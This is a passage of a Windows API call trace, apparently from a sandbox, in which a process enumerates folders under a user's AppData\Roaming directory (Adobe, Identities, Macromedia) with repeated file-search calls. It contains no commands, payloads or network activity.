lpFindFileData=0x364560) returned 0 [0052.012] GetLastError () returned 0x12 [0052.012] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.012] SetErrorMode (uMode=0x0) returned 0x1 [0052.012] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x33 [0052.012] GetLastError () returned 0x12 [0052.012] SetErrorMode (uMode=0x1) returned 0x0 [0052.012] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.012] GetLastError () returned 0x12 [0052.012] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.012] GetLastError () returned 0x12 [0052.012] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.012] GetLastError () returned 0x12 [0052.013] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.013] GetLastError () returned 0x12 [0052.013] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.013] SetErrorMode (uMode=0x0) returned 0x1 [0052.013] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpFilePart=0x0) returned 0x3e [0052.013] GetLastError () returned 0x12 [0052.013] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.013] GetLastError () returned 0x12 [0052.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.013] GetLastError () returned 0x12 [0052.013] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpFilePart=0x0) returned 0x3e [0052.013] GetLastError () returned 0x12 [0052.013] SetErrorMode (uMode=0x1) returned 0x0 [0052.013] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.014] GetLastError () returned 0x12 [0052.014] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.014] GetLastError () returned 0x12 [0052.014] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.014] GetLastError () returned 0x12 [0052.014] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.014] GetLastError () returned 0x12 [0052.014] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.014] SetErrorMode (uMode=0x0) returned 0x1 [0052.014] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpFilePart=0x0) returned 0x3e [0052.014] GetLastError () returned 0x12 [0052.014] SetErrorMode (uMode=0x1) returned 0x0 [0052.015] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.015] GetLastError () returned 0x12 [0052.015] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.015] GetLastError () returned 0x12 [0052.015] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.015] GetLastError () returned 0x12 [0052.015] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.015] GetLastError () returned 0x12 [0052.015] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.015] SetErrorMode (uMode=0x0) returned 0x1 [0052.015] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", lpFilePart=0x0) returned 0x47 [0052.015] GetLastError () returned 0x12 [0052.015] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.015] GetLastError () returned 0x12 [0052.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.015] GetLastError () returned 0x12 [0052.016] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", lpFilePart=0x0) returned 0x47 [0052.016] GetLastError () returned 0x12 [0052.016] SetErrorMode (uMode=0x1) returned 0x0 [0052.016] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.016] GetLastError () returned 0x12 [0052.016] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.016] GetLastError () returned 0x12 [0052.016] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.016] GetLastError () returned 0x12 [0052.017] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.017] SetErrorMode (uMode=0x0) returned 0x1 [0052.017] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ", lpFilePart=0x0) returned 0x47 [0052.017] GetLastError () returned 0x12 [0052.017] SetErrorMode (uMode=0x1) returned 0x0 [0052.017] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\VLS846JQ\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.017] GetLastError () returned 0x12 [0052.017] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.017] GetLastError () returned 0x12 [0052.017] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.017] GetLastError () returned 0x12 [0052.017] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.017] SetErrorMode (uMode=0x0) returned 0x1 [0052.017] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", lpFilePart=0x0) returned 0x31 [0052.017] GetLastError () returned 0x12 [0052.017] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.017] GetLastError () returned 0x12 [0052.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.018] GetLastError () returned 0x12 [0052.018] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", lpFilePart=0x0) returned 0x31 [0052.018] GetLastError () returned 0x12 [0052.018] SetErrorMode (uMode=0x1) returned 0x0 [0052.018] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.018] GetLastError () returned 0x12 [0052.018] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.018] GetLastError () returned 0x12 [0052.018] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.018] GetLastError () returned 0x12 [0052.018] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.018] SetErrorMode (uMode=0x0) returned 0x1 [0052.018] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights", lpFilePart=0x0) returned 0x31 [0052.018] GetLastError () returned 0x12 [0052.018] SetErrorMode (uMode=0x1) returned 0x0 [0052.018] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.019] GetLastError () returned 0x12 [0052.019] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.019] GetLastError () returned 0x12 [0052.019] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.019] GetLastError () returned 0x12 [0052.019] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.019] SetErrorMode (uMode=0x0) returned 0x1 [0052.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x32 [0052.019] GetLastError () returned 0x12 [0052.019] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.019] GetLastError () returned 0x12 [0052.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.019] GetLastError () returned 0x12 [0052.019] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x32 [0052.019] GetLastError () returned 0x12 [0052.019] SetErrorMode (uMode=0x1) returned 0x0 [0052.019] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.019] GetLastError () returned 0x12 [0052.019] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.020] GetLastError () returned 0x12 [0052.020] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.020] GetLastError () returned 0x12 [0052.020] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.020] GetLastError () returned 0x12 [0052.020] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.020] SetErrorMode (uMode=0x0) returned 0x1 [0052.020] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics", lpFilePart=0x0) returned 0x32 [0052.020] GetLastError () returned 0x12 [0052.020] SetErrorMode (uMode=0x1) returned 0x0 [0052.020] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.020] GetLastError () returned 0x12 [0052.020] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.020] GetLastError () returned 0x12 [0052.020] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.020] GetLastError () returned 0x12 [0052.020] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.021] GetLastError () returned 0x12 [0052.021] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.021] SetErrorMode (uMode=0x0) returned 0x1 [0052.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x3f [0052.021] GetLastError () returned 0x12 [0052.021] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.021] GetLastError () returned 0x12 [0052.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.021] GetLastError () returned 0x12 [0052.021] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x3f [0052.021] GetLastError () returned 0x12 [0052.021] SetErrorMode (uMode=0x1) returned 0x0 [0052.021] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.021] GetLastError () returned 0x12 [0052.021] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.021] GetLastError () returned 0x12 [0052.021] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.021] GetLastError () returned 0x12 [0052.022] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.022] SetErrorMode (uMode=0x0) returned 0x1 [0052.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries", lpFilePart=0x0) returned 0x3f [0052.022] GetLastError () returned 0x12 [0052.022] SetErrorMode (uMode=0x1) returned 0x0 [0052.022] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.022] GetLastError () returned 0x12 [0052.022] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.022] GetLastError () returned 0x12 [0052.022] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.022] GetLastError () returned 0x12 [0052.022] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.022] SetErrorMode (uMode=0x0) returned 0x1 [0052.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", lpFilePart=0x0) returned 0x34 [0052.022] GetLastError () returned 0x12 [0052.022] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.022] GetLastError () returned 0x12 [0052.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.022] GetLastError () returned 0x12 [0052.022] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", lpFilePart=0x0) returned 0x34 [0052.023] GetLastError () returned 0x12 [0052.023] SetErrorMode (uMode=0x1) returned 0x0 [0052.023] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.023] GetLastError () returned 0x12 [0052.023] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.023] GetLastError () returned 0x12 [0052.023] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.023] GetLastError () returned 0x12 [0052.023] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.023] SetErrorMode (uMode=0x0) returned 0x1 [0052.023] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2", lpFilePart=0x0) returned 0x34 [0052.023] GetLastError () returned 0x12 [0052.023] SetErrorMode (uMode=0x1) returned 0x0 [0052.023] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.023] GetLastError () returned 0x12 [0052.023] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.023] GetLastError () returned 0x12 [0052.023] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.023] GetLastError () returned 0x12 [0052.024] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.024] SetErrorMode (uMode=0x0) returned 0x1 [0052.024] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0052.024] GetLastError () returned 0x12 [0052.024] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.024] GetLastError () returned 0x12 [0052.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.024] GetLastError () returned 0x12 [0052.024] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0052.024] GetLastError () returned 0x12 [0052.024] SetErrorMode (uMode=0x1) returned 0x0 [0052.024] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.024] GetLastError () returned 0x12 [0052.024] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.024] GetLastError () returned 0x12 [0052.025] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.025] GetLastError () returned 0x12 [0052.025] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.025] GetLastError () returned 0x12 [0052.025] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.025] SetErrorMode (uMode=0x0) returned 0x1 [0052.025] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2b [0052.025] GetLastError () returned 0x12 [0052.025] SetErrorMode (uMode=0x1) returned 0x0 [0052.025] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.025] GetLastError () returned 0x12 [0052.025] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.025] GetLastError () returned 0x12 [0052.025] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.025] GetLastError () returned 0x12 [0052.025] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.025] GetLastError () returned 0x12 [0052.025] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.026] SetErrorMode (uMode=0x0) returned 0x1 [0052.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0052.026] GetLastError () returned 0x12 [0052.026] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.026] GetLastError () returned 0x12 [0052.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.026] GetLastError () returned 0x12 [0052.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0052.026] GetLastError () returned 0x12 [0052.026] SetErrorMode (uMode=0x1) returned 0x0 [0052.026] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.026] GetLastError () returned 0x12 [0052.026] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.026] GetLastError () returned 0x12 [0052.026] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.026] GetLastError () returned 0x12 [0052.026] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.026] SetErrorMode (uMode=0x0) returned 0x1 [0052.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}", lpFilePart=0x0) returned 0x52 [0052.026] GetLastError () returned 0x12 [0052.026] SetErrorMode (uMode=0x1) returned 0x0 [0052.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Identities\\{74A13782-B361-4204-9DAA-0A3D49DA4337}\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.027] GetLastError () returned 0x12 [0052.027] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.027] GetLastError () returned 0x12 [0052.027] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.027] GetLastError () returned 0x12 [0052.027] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.027] SetErrorMode (uMode=0x0) returned 0x1 [0052.027] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", lpFilePart=0x0) returned 0x2b [0052.027] GetLastError () returned 0x12 [0052.027] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0052.027] GetLastError () returned 0x12 [0052.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0052.027] GetLastError () returned 0x12 [0052.027] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia", lpFilePart=0x0) returned 0x2b [0052.027] GetLastError () returned 0x12 [0052.027] SetErrorMode (uMode=0x1) returned 0x0 [0052.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.028] GetLastError () returned 0x12 [0052.028] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.028] GetLastError () returned 0x12 [0052.028] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.028] GetLastError () returned 0x12 [0052.028] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.028] GetLastError () returned 0x12 